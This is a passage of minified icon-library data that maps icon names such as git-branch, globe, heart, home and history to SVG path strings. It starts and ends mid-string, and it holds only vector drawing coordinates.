.51-.02.76-.06l.17-.03c.25-.04.49-.1.73-.17h.01c.24-.08.47-.17.69-.28.04-.02.07-.04.11-.05.23-.11.44-.24.65-.38l3.68 3.68c.17.18.42.29.7.29a1.003 1.003 0 0 0 .71-1.71zM11.5 9.5c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4zm1.93 5.33v-.65c0-.11-.13-.21-.24-.21-.11 0-.24.09-.24.21v.65c0 .11.13.21.24.21.11 0 .24-.1.24-.21zm-2.41.67h.83c.29 0 .46-.21.46-.5v-1.86l.23-.22c-.34.05-.69.08-1.04.08-.36 0-.7-.03-1.05-.08.03.05.06.1.08.16V15c.01.29.2.5.49.5z"],"git-branch":["M15 2c-1.66 0-3 1.34-3 3 0 1.3.84 2.4 2 2.82V9c0 1.1-.9 2-2 2H8c-.73 0-1.41.21-2 .55V5.82C7.16 5.4 8 4.3 8 3c0-1.66-1.34-3-3-3S2 1.34 2 3c0 1.3.84 2.4 2 2.82v8.37C2.84 14.6 2 15.7 2 17c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.25-.77-2.3-1.85-2.75C6.45 13.52 7.16 13 8 13h4c2.21 0 4-1.79 4-4V7.82C17.16 7.4 18 6.3 18 5c0-1.66-1.34-3-3-3zM5 2c.55 0 1 .45 1 1s-.45 1-1 1-1-.45-1-1 .45-1 1-1zm0 16c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zM15 6c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-commit":["M19 9h-4.1a5 5 0 0 0-9.8 0H1c-.55 0-1 .45-1 1s.45 1 1 1h4.1a5 5 0 0 0 9.8 0H19c.55 0 1-.45 1-1s-.45-1-1-1zm-9 4c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z"],"git-merge":["M15 8c-1.3 0-2.4.84-2.82 2H11c-2.49 0-4.54-1.83-4.92-4.21A2.995 2.995 0 0 0 5 0C3.34 0 2 1.34 2 3c0 1.3.84 2.4 2 2.81v8.37C2.84 14.6 2 15.7 2 17c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.3-.84-2.4-2-2.82V9.86C7.27 11.17 9.03 12 11 12h1.18A2.996 2.996 0 0 0 18 11c0-1.66-1.34-3-3-3zM5 18c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zM5 4c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm10 8c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-new-branch":["M17 3h-1V2c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1V5h1c.55 0 1-.45 1-1s-.45-1-1-1zm-3 4.86V9c0 1.1-.9 2-2 2H8c-.73 0-1.41.21-2 .55V5.82C7.16 5.4 8 4.3 8 3c0-1.66-1.34-3-3-3S2 1.34 2 3c0 1.3.84 2.4 2 2.82v8.37C2.84 14.6 2 15.7 2 17c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.25-.77-2.3-1.85-2.75C6.45 13.52 7.16 13 8 13h4c2.21 0 4-1.79 4-4V7.86c-.32.08-.65.14-1 .14s-.68-.06-1-.14zM5 2c.55 0 1 .45 1 1s-.45 1-1 1-1-.45-1-1 .45-1 1-1zm0 16c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-pull":["M17 14.18V7c0-2.21-1.79-4-4-4h-2.59l1.29-1.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3C7.11 3.47 7 3.72 7 4c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L10.41 5H13c1.1 0 2 .9 2 2v7.18A2.996 2.996 0 0 0 16 20c1.66 0 3-1.34 3-3 0-1.3-.84-2.4-2-2.82zM16 18c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zM4 1C2.34 1 1 2.34 1 4c0 1.3.84 2.4 2 2.82v7.37C1.84 14.6 1 15.7 1 17c0 1.66 1.34 3 3 3s3-1.34 3-3c0-1.3-.84-2.4-2-2.82V6.82C6.16 6.4 7 5.3 7 4c0-1.66-1.34-3-3-3zm0 17c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zM4 5c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"git-push":["M15 11c0-.28-.11-.53-.29-.71l-3-3C11.53 7.11 11.28 7 11 7s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42l1.29-1.3V19c0 .55.45 1 1 1s1-.45 1-1v-8.59l1.29 1.29c.18.19.43.3.71.3.55 0 1-.45 1-1zm4-11H1C.45 0 0 .45 0 1v16c0 .55.45 1 1 1h7v-2H2v-2h6v-1H4V2h14v11h-4v1h4v2h-4v2h5c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM5 8h2V6H5v2zm2-5H5v2h2V3z"],"git-repo":["M7 3H5v2h2V3zm0 6H5v2h2V9zm0-3H5v2h2V6zm12-6H1C.45 0 0 .45 0 1v16c0 .55.45 1 1 1h4v2l2-1 2 1v-2h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 16H9v-1H5v1H2v-2h16v2zm0-3H4V2h14v11z"],glass:["M17 6V0H3v6c0 3.53 2.61 6.43 6 6.92V18H6c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1h-3v-5.08c3.39-.49 6-3.39 6-6.92z"],globe:["M7.53 4.37c.1-.1.1-.26 0-.35l-.68-.68c-.1-.1-.25-.1-.35 0-.1.1-.1.26 0 .35l.68.68c.1.1.25.1.35 0zm3.17.06h.3c.09 0 .16-.01.16-.1 0-.09-.07-.1-.16-.1h-.3c-.09 0-.16.01-.16.1s.07.1.16.1zm.98 1.15c.09 0 .19-.08.19-.17v-.42c0-.09-.1-.17-.19-.17s-.19.08-.19.17v.42c0 .09.1.17.19.17zm-6.5 4.19c-.35 0-.56.28-.56.63v2.37c0 .35.21.62.56.62h.39v2.4c0 .34.33.61.67.61s.67-.27.67-.61v-1.44h-.02c.35 0 .6-.19.6-.54v-.41h.18c.35 0 .58-.28.58-.62v-.81c0-.01.01-.01 0-.02L6.1 9.77h-.92zM10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8 0-.74.11-1.46.3-2.14h.03v.65c0 .28.25.5.53.5.05 0 .1-.01.15-.02l1.05 1.05c.1.11.28.11.38 0 .1-.1.11-.27 0-.38L3.42 8.59c0-.03.05-.05.05-.08v-.16c0-.22.12-.3.34-.49h.63c.12 0 .23-.01.32-.07.01-.01.02 0 .03-.01.02-.02.04-.03.06-.04.01-.01.02-.01.03-.02l.02-.02 2.15-2.15c.24-.24.24-.63 0-.86-.23-.24-.62-.19-.86.04l-.41.46H5v-.64c0-.01.07.07.07-.12h.87c.17 0 .3-.12.3-.29 0-.17-.13-.29-.3-.29H4.88C6.27 2.7 8.05 2 10 2s3.73.7 5.12 1.86h-1.58l-.01-.04c-.06 0-.12 0-.17.04l-.71.7c-.09.09-.09.23 0 .31.09.09.23.09.32 0l.56-.6.01-.03h.34c0 .19-.1.13-.1.16v.1c0 .29-.2.5-.49.5h-.51c-.25 0-.52.28-.52.54v.23h-.12c-.16 0-.27.08-.27.24v.33h-.32c-.23 0-.41.15-.41.38 0 .22.18.35.41.35.1 0 .19.04.26-.16l.06.01.66-.59h.23l.53.5c.04.04.11.03.16-.01.04-.04.04-.16 0-.2L13 6.15h.32l.12.16c.25.25.65.23.89-.02l.12-.14H15c.02 0 .11.07.11.07v.33s-.06-.01-.07-.01h-.49c-.16 0-.28.13-.28.29 0 .16.13.29.28.29h.49c.01 0 .07-.01.07-.01v.2c-.19.28-.33.57-.62.57h-1.28s0-.01-.01-.01l-.58-.58a.622.622 0 0 0-.89 0l-.58.58s0 .01-.01.01h-.34c-.35 0-.67.28-.67.63v1.25c0 .35.32.61.67.61h1.22c.46.19.78.48.97.94v2.28c0 .35.23.6.58.6h.98c.35 0 .54-.25.54-.6v-2.2l1.21-1.17.04-.02.02-.01h.04c.1-.11.2-.26.2-.42V8.49c0-.25-.22-.44-.42-.63h.58c.02.38.29.57.63.57h.43c.13.51.18 1.03.18 1.57 0 4.42-3.58 8-8 8zm6.16-5.65c-.14 0-.29.11-.29.25v.77c0 .14.15.25.29.25.14 0 .29-.11.29-.25v-.77c0-.14-.15-.25-.29-.25zM10.5 3.48c0-.34-.28-.57-.62-.57h-.74c-.34 0-.57.25-.57.59 0 .05-.13.06.06.1v.64c0 .2.09.36.29.36.2 0 .29-.16.29-.36v-.19h.68c.33 0 .61-.23.61-.57z"],"globe-network":["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm7.39 7h-3.63c-.31-1.99-.92-3.66-1.72-4.73 2.45.65 4.41 2.42 5.35 4.73zM13 10c0 .69-.04 1.36-.11 2H7.11a18.419 18.419 0 0 1 0-4h5.77c.08.64.12 1.31.12 2zm-3-8c1.07 0 2.25 2.05 2.75 5h-5.5c.5-2.95 1.68-5 2.75-5zm-2.04.27C7.16 3.34 6.55 5.01 6.24 7H2.61c.94-2.31 2.9-4.08 5.35-4.73zM2 10c0-.69.11-1.36.28-2h3.83a18.419 18.419 0 0 0 0 4H2.28c-.17-.64-.28-1.31-.28-2zm.61 3h3.63c.31 1.99.92 3.66 1.72 4.73A7.996 7.996 0 0 1 2.61 13zM10 18c-1.07 0-2.25-2.05-2.75-5h5.5c-.5 2.95-1.68 5-2.75 5zm2.04-.27c.79-1.07 1.4-2.74 1.72-4.73h3.63a7.996 7.996 0 0 1-5.35 4.73zM13.89 12a18.419 18.419 0 0 0 0-4h3.83c.17.64.28 1.31.28 2s-.11 1.36-.28 2h-3.83z"],graph:["M17.5 4A2.5 2.5 0 0 0 15 6.5c0 .06.01.12.02.18l-1.9.84C12.38 6.6 11.27 6 10 6c-.83 0-1.59.25-2.23.68L4.91 4.14c.05-.21.09-.42.09-.64a2.5 2.5 0 0 0-5 0A2.5 2.5 0 0 0 2.5 6c.42 0 .81-.11 1.16-.3l2.79 2.48C6.17 8.73 6 9.34 6 10c0 1.41.73 2.64 1.83 3.35l-.56 1.67A2.498 2.498 0 0 0 5 17.5a2.5 2.5 0 0 0 5 0c0-.74-.32-1.39-.83-1.85l.56-1.68c.09.01.18.03.27.03 2.21 0 4-1.79 4-4 0-.22-.03-.44-.07-.65l2.02-.9c.43.34.96.55 1.55.55a2.5 2.5 0 0 0 0-5z"],"graph-remove":["M17.41 4l2.29-2.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L16 2.59 13.71.3A.965.965 0 0 0 13 0a1.003 1.003 0 0 0-.71 1.71L14.59 4 12.3 6.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L16 5.41l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L17.41 4zM19 10c-.83 0-1.55-.36-2.09-.91l-.03.03-.88-.88-.88.88a2.996 2.996 0 1 1-4.24-4.24l.88-.88-.88-.88.03-.03C10.36 2.55 10 1.83 10 1c0-.35.07-.68.18-.99-.06 0-.12-.01-.18-.01C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10c0-.06-.01-.12-.01-.18-.31.11-.64.18-.99.18z"],grid:["M19 11c.55 0 1-.45 1-1s-.45-1-1-1h-2V5h2c.55 0 1-.45 1-1s-.45-1-1-1h-2V1c0-.55-.45-1-1-1s-1 .45-1 1v2h-4V1c0-.55-.45-1-1-1S9 .45 9 1v2H5V1c0-.55-.45-1-1-1S3 .45 3 1v2H1c-.55 0-1 .45-1 1s.45 1 1 1h2v4H1c-.55 0-1 .45-1 1s.45 1 1 1h2v4H1c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h4v2c0 .55.45 1 1 1s1-.45 1-1v-2h4v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1h-2v-4h2zM9 15H5v-4h4v4zm0-6H5V5h4v4zm6 6h-4v-4h4v4zm0-6h-4V5h4v4z"],"grid-view":["M0 19c0 .55.45 1 1 1h8v-9H0v8zM0 1v8h9V0H1C.45 0 0 .45 0 1zm19-1h-8v9h9V1c0-.55-.45-1-1-1zm-8 20h8c.55 0 1-.45 1-1v-8h-9v9z"],"group-objects":["M6 7c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3zm8-3H6c-3.31 0-6 2.69-6 6s2.69 6 6 6h8c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 11H6c-2.76 0-5-2.24-5-5s2.24-5 5-5h8c2.76 0 5 2.24 5 5s-2.24 5-5 5zm0-8c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"],"grouped-bar-chart":["M12 16h1c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1h-1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1zm7 1H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm-3-1h1c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1h-1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1zm-9 0h1c.55 0 1-.45 1-1v-5c0-.55-.45-1-1-1H7c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1zm-4 0h1c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v13c0 .55.45 1 1 1z"],hand:["M17 5c-.42 0-.79.27-.93.64L14.38 10h-.77l1.34-6.67c.03-.1.05-.21.05-.33a.998.998 0 1 0-1.98-.19h-.01L11.57 10H11V1c0-.55-.45-1-1-1S9 .45 9 1v9h-.2L6.97 2.76a.997.997 0 0 0-1.73-.41l-.03.03c-.01.02-.02.03-.03.04-.01.02-.01.03-.02.04v.01c-.01.01-.02.02-.02.03v.01c-.02.01-.02.02-.03.03 0 0 0 .01-.01.01 0 .01 0 .02-.01.03 0 0 0 .01-.01.01 0 .01-.01.02-.01.03 0 0 0 .01-.01.01 0 .01-.01.02-.01.03 0 .01 0 .01-.01.02 0 .01-.01.02-.01.03 0 .01 0 .01-.01.02 0 .01-.01.02-.01.03v.02c0 .01 0 .02-.01.03V3c0 .05 0 .09.01.14l1.45 10.25L6 12.7v.01L3.84 9.45h-.01A.98.98 0 0 0 3 9c-.55 0-1 .45-1 1 0 .2.06.39.17.55L6 18.44C7.06 19.4 8.46 20 10 20c3.31 0 6-2.69 6-6v-1.84l.01-.03v-.06l1.94-5.75A1.003 1.003 0 0 0 17 5z"],"hand-down":["M17.68 9.84C15.91 9 14.27 6.49 13.45 4.9 12.41 2.43 12.21 0 7.87 0 5.49 0 3.95.76 3.05 2.65 2.31 4.2 2 5.48 2 9.79v.99c0 .82.69 1.48 1.54 1.48.38 0 .73-.14 1-.36.19.6.78 1.05 1.47 1.05.47 0 .89-.2 1.17-.52.26.47.77.79 1.36.79.65 0 1.2-.39 1.43-.93l.03.77v5.44c0 .48.23.91.59 1.18.21.19.5.32.85.32h.06c.83 0 1.5-.67 1.5-1.5v-8.24l.01-.67c.85.98 1.92 1.76 3.24 1.89 1.79.19 2.09-1.33 1.43-1.64z"],"hand-left":["M15.1 6.54c-1.58-.81-4.09-2.46-4.94-4.23-.31-.65-1.82-.35-1.64 1.43.13 1.33.91 2.4 1.89 3.24L9.74 7H1.5C.67 7 0 7.67 0 8.5v.06c0 .36.13.64.32.85.27.36.7.59 1.18.59h5.44l.78.01c-.54.23-.93.78-.93 1.43 0 .59.32 1.1.79 1.36-.32.28-.52.7-.52 1.17 0 .69.44 1.28 1.05 1.47-.22.27-.36.62-.36 1 0 .85.66 1.54 1.48 1.54h.99c4.31 0 5.59-.31 7.14-1.05 1.89-.9 2.65-2.44 2.65-4.82-.01-4.32-2.44-4.52-4.91-5.57z"],"hand-right":["M20 8.5c0-.83-.67-1.5-1.5-1.5h-8.24l-.67-.01c.98-.85 1.76-1.92 1.89-3.24.18-1.79-1.33-2.08-1.65-1.43-.84 1.76-3.35 3.41-4.93 4.23C2.43 7.59 0 7.79 0 12.13c0 2.38.76 3.92 2.65 4.82C4.2 17.69 5.48 18 9.79 18h.99c.82 0 1.48-.69 1.48-1.54 0-.38-.14-.73-.36-1 .6-.19 1.05-.78 1.05-1.47 0-.47-.2-.89-.52-1.17.47-.26.79-.77.79-1.36 0-.65-.39-1.2-.93-1.43l.77-.03h5.44c.48 0 .91-.23 1.18-.59.19-.21.32-.49.32-.85v-.03-.03z"],"hand-up":["M16.46 7.74c-.38 0-.73.14-1 .36-.19-.6-.78-1.05-1.47-1.05-.47 0-.89.2-1.17.52-.26-.47-.77-.79-1.36-.79-.65 0-1.2.39-1.43.93L10 6.94V1.5c0-.48-.23-.91-.59-1.18C9.2.13 8.92 0 8.56 0H8.5C7.67 0 7 .67 7 1.5v8.24l-.01.67c-.84-.98-1.92-1.76-3.24-1.89-1.79-.18-2.08 1.33-1.43 1.65 1.77.84 3.41 3.35 4.23 4.94 1.05 2.47 1.25 4.9 5.58 4.9 2.38 0 3.92-.76 4.82-2.65.74-1.56 1.05-2.84 1.05-7.15v-.99c0-.81-.69-1.48-1.54-1.48z"],header:["M16 1c-.55 0-1 .45-1 1v7H5V2c0-.55-.45-1-1-1s-1 .45-1 1v16c0 .55.45 1 1 1s1-.45 1-1v-7h10v7c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],"header-one":["M10 0c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1s-1-.45-1-1V9H2v6c0 .55-.45 1-1 1s-1-.45-1-1V1c0-.55.45-1 1-1s1 .45 1 1v6h7V1c0-.55.45-1 1-1zm7.4 10.77c.17-.2.29-.46.34-.77H19v10h-1.5v-7.11H15v-1.24c.32 0 .63-.03.93-.08.31-.06.58-.16.83-.29.26-.12.47-.3.64-.51z"],"header-two":["M16.6 17.41c-.22.17-.4.36-.56.55-.16.19-.27.4-.33.61h4.28V20H14c.01-.81.18-1.52.53-2.13.35-.6.81-1.13 1.41-1.58.28-.23.58-.46.89-.68.31-.22.59-.46.85-.71.26-.26.48-.53.63-.83.16-.3.25-.64.26-1.02 0-.18-.02-.37-.06-.57-.04-.2-.11-.39-.22-.56s-.26-.31-.45-.43-.44-.18-.75-.18c-.28 0-.52.06-.71.19s-.34.3-.45.52c-.11.22-.2.48-.25.78-.05.3-.08.62-.09.97h-1.43c0-.54.07-1.04.2-1.5.13-.47.32-.87.58-1.2.26-.34.58-.6.95-.78.37-.19.81-.29 1.3-.29.54 0 .99.09 1.35.29.36.19.65.44.87.74.22.29.38.62.47.97.09.35.14.68.14 1 0 .4-.05.75-.16 1.07-.11.32-.26.61-.44.88-.19.27-.4.52-.63.74-.24.22-.48.43-.73.63s-.5.38-.75.56c-.26.17-.5.35-.71.53zM10 0c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1s-1-.45-1-1V9H2v6c0 .55-.45 1-1 1s-1-.45-1-1V1c0-.55.45-1 1-1s1 .45 1 1v6h7V1c0-.55.45-1 1-1z"],headset:["M18.97 9H19A9 9 0 0 0 1 9h.03C.41 9.73 0 10.8 0 12c0 1.74.84 3.2 2 3.76V16c0 1.66 1.34 3 3 3h3c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1H5c-.55 0-1-.45-1-1 .55 0 1-.45 1-1V9c0-.55-.45-1-1-1h-.92C3.57 4.61 6.47 2 10 2s6.43 2.61 6.92 6H16c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1h1c1.66 0 3-1.79 3-4 0-1.2-.41-2.27-1.03-3z"],heart:["M20 6.25C20 3.35 17.65 1 14.75 1c-1.02 0-1.95.31-2.75.82v-.04c-.09.06-.17.12-.26.19-.04.03-.09.06-.14.1-.68.51-1.24 1.18-1.6 1.96-.4-.86-1.04-1.57-1.8-2.1-.04-.02-.07-.05-.1-.08a7 7 0 0 0-.6-.33c-.13-.04-.23-.1-.35-.15-.05-.02-.1-.05-.15-.07v.02C6.45 1.13 5.87 1 5.25 1A5.25 5.25 0 0 0 0 6.25c0 .09.01.17.01.25H0c0 .06.01.12.02.18s.01.12.02.18C.13 7.89.44 9 1.07 10.17 2.23 12.33 4.1 14.11 7 16.53v.01c.9.75 1.89 1.55 3 2.46.71-.58 1.38-1.12 2-1.63 3.48-2.86 5.64-4.78 6.93-7.18.63-1.17.94-2.27 1.03-3.3.01-.07.01-.14.02-.21 0-.06.01-.11.02-.17h-.01c0-.09.01-.17.01-.26z"],"heart-broken":["M8.11 7.45C8.05 7.31 8 7.16 8 7c0-.07.03-.13.04-.19h-.02l.86-4.32A5.159 5.159 0 0 0 5.25 1 5.25 5.25 0 0 0 0 6.25c0 .09.01.17.01.25H0c0 .06.01.12.02.18s.01.12.02.18C.13 7.89.44 9 1.07 10.17c1.38 2.58 3.76 4.6 7.71 7.83l-.76-3.8h.02c-.01-.07-.04-.13-.04-.2 0-.21.08-.39.18-.54l-.02-.01 1.68-2.52-1.73-3.48zM20 6.25C20 3.35 17.65 1 14.75 1c-1.54 0-2.92.67-3.88 1.73l-.83 4.13 1.85 3.69h-.01c.07.14.12.29.12.45 0 .21-.08.39-.18.54l.02.01-1.77 2.66.81 4.07c4.16-3.39 6.63-5.45 8.05-8.1.63-1.17.94-2.27 1.03-3.3.01-.07.01-.14.02-.21 0-.06.01-.11.02-.17h-.01c0-.08.01-.16.01-.25z"],"heat-grid":["M14 12h6V8h-6v4zM0 12h6V8H0v4zm1-3h4v2H1V9zm-1 7c0 .55.45 1 1 1h5v-4H0v3zM19 3h-5v4h6V4c0-.55-.45-1-1-1zm0 3h-4V4h4v2zM0 4v3h6V3H1c-.55 0-1 .45-1 1zm7 3h6V3H7v4zm7 10h5c.55 0 1-.45 1-1v-3h-6v4zm-7 0h6v-4H7v4zm1-3h4v2H8v-2zm-1-2h6V8H7v4z"],heatmap:["M6 0a6 6 0 1 0 0 12A6 6 0 1 0 6 0z","M10.5 8a4.5 4.5 0 1 0 0 9 4.5 4.5 0 1 0 0-9z","M16.5 7a3.5 3.5 0 1 0 0 7 3.5 3.5 0 1 0 0-7zM18 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2.5 14a2.5 2.5 0 1 0 0 5 2.5 2.5 0 1 0 0-5zM16.5 0a2.5 2.5 0 1 0 0 5 2.5 2.5 0 1 0 0-5z"],help:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zM7.41 4.62c.65-.54 1.51-.82 2.56-.82.54 0 1.03.08 1.48.25.44.17.83.39 1.14.68.32.29.56.63.74 1.02.17.39.26.82.26 1.27s-.08.87-.24 1.23c-.16.37-.4.73-.71 1.11l-1.21 1.58c-.14.17-.28.33-.32.48-.05.15-.11.35-.11.6v.97H9v-2s.06-.58.24-.81l1.21-1.64c.25-.3.41-.56.51-.77s.14-.44.14-.67c0-.35-.11-.63-.32-.85s-.5-.33-.88-.33c-.37 0-.67.11-.89.33-.22.23-.37.54-.46.94-.03.12-.11.17-.23.16l-1.95-.29c-.12-.01-.16-.08-.14-.22.13-.93.52-1.67 1.18-2.22zM9 14h2.02L11 16H9v-2z"],"helper-management":["M17 10h-3v3h3v-3zm0 4h-3v3h3v-3zm0-8h-3v3h3V6zm2-6H1C.4 0 0 .4 0 1v18c0 .5.4 1 1 1h18c.5 0 1-.5 1-1V1c0-.6-.5-1-1-1zm-1 18H2V2h16v16zm-9-4H6v3h3v-3zm4 0h-3v3h3v-3z"],highlight:["M11.22 14.09l3.03-3.03.71.71L20 6.73l-5.71-5.71-5.04 5.04.71.71-3.02 3.04 4.28 4.28zm6.8 3.91h-16c-.55 0-1 .45-1 1s.45 1 1 1h16c.55 0 1-.45 1-1s-.45-1-1-1zm-15-1h4.04c.28 0 .53-.11.71-.3l2.02-2.02-3.44-3.45-4.04 4.04c-.18.18-.3.44-.3.71.01.57.46 1.02 1.01 1.02z"],history:["M10 0C6.71 0 3.82 1.6 2 4.05V2c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H3.76C5.23 3.17 7.47 2 10 2c4.42 0 8 3.58 8 8s-3.58 8-8 8-8-3.58-8-8c0-.55-.45-1-1-1s-1 .45-1 1c0 5.52 4.48 10 10 10s10-4.48 10-10S15.52 0 10 0zm0 3c-.55 0-1 .45-1 1v6c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L11 9.59V4c0-.55-.45-1-1-1z"],home:["M2 12v7c0 .55.45 1 1 1h5v-7h4v7h5c.55 0 1-.45 1-1v-7l-8-8-8 8zm17.71-2.71L17 6.59V3c0-.55-.45-1-1-1s-1 .45-1 1v1.59L10.71.3C10.53.11 10.28 0 10 0s-.53.11-.71.29l-9 9a1.003 1.003 0 0 0 1.42 1.42L10 2.41l8.29 8.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"horizontal-bar-chart":["M1 1c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1zm3 5h11c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1zm8 8H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h8c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1zm7-6H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h15c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1z"],"horizontal-bar-chart-asc":["M1 9h11c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm0-5h9c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zm18 12H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zM1 14h14c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1z"],"horizontal-bar-chart-desc":["M10 16H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h9c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm2-5H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h11c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm3-5H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1zm4-5H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1z"],"horizontal-distribution":["M12 2H8c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zM1 0C.45 0 0 .45 0 1v18c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm18 0c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],"id-number":["M2 5v10h16V5H2zm0-2h16c1.1 0 2 .9 2 2v10c0 1.1-.9 2-2 2H2c-1.1 0-2-.9-2-2V5c0-1.1.9-2 2-2z","M8.88 12.38c-.17-.39-1.01-.66-1.56-.9-.56-.24-.48-.39-.5-.6v-.09c.19-.17.35-.4.45-.67 0 0 0-.02.01-.02l.06-.18c.13-.03.2-.17.23-.29.03-.05.09-.18.08-.33-.04-.18-.11-.27-.2-.3v-.03c0-.24-.02-.58-.06-.81-.01-.06-.02-.12-.04-.19-.08-.27-.25-.52-.48-.7C6.63 7.09 6.3 7 6 7s-.63.09-.87.27c-.23.17-.4.42-.48.7-.02.06-.03.13-.04.19-.04.22-.06.57-.06.81V9c-.09.03-.17.12-.19.31-.01.14.05.27.08.32.03.14.1.27.23.3.02.06.03.12.06.18v.01c.11.27.27.51.47.68v.08c-.02.2.04.35-.51.6-.56.24-1.39.51-1.56.9-.19.39-.12.62-.12.62h5.98c-.01 0 .06-.23-.11-.62zM12 7h4c.55 0 1 .45 1 1s-.45 1-1 1h-4c-.55 0-1-.45-1-1s.45-1 1-1zM12 11h4c.55 0 1 .45 1 1s-.45 1-1 1h-4c-.55 0-1-.45-1-1s.45-1 1-1z"],"image-rotate-left":["M10.5 13c.83 0 1.5-.67 1.5-1.5s-.67-1.5-1.5-1.5-1.5.67-1.5 1.5.67 1.5 1.5 1.5zM14 7H1c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-1 10l-5-3-1 2-2-4-3 4.5V9h11v8zm3-15h-1.59l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H16c1.1 0 2 .9 2 2v3c0 .55.45 1 1 1s1-.45 1-1V6c0-2.21-1.79-4-4-4z"],"image-rotate-right":["M5.29 4.29a1.003 1.003 0 0 0 1.42 1.42l2-2C8.89 3.53 9 3.28 9 3c0-.28-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 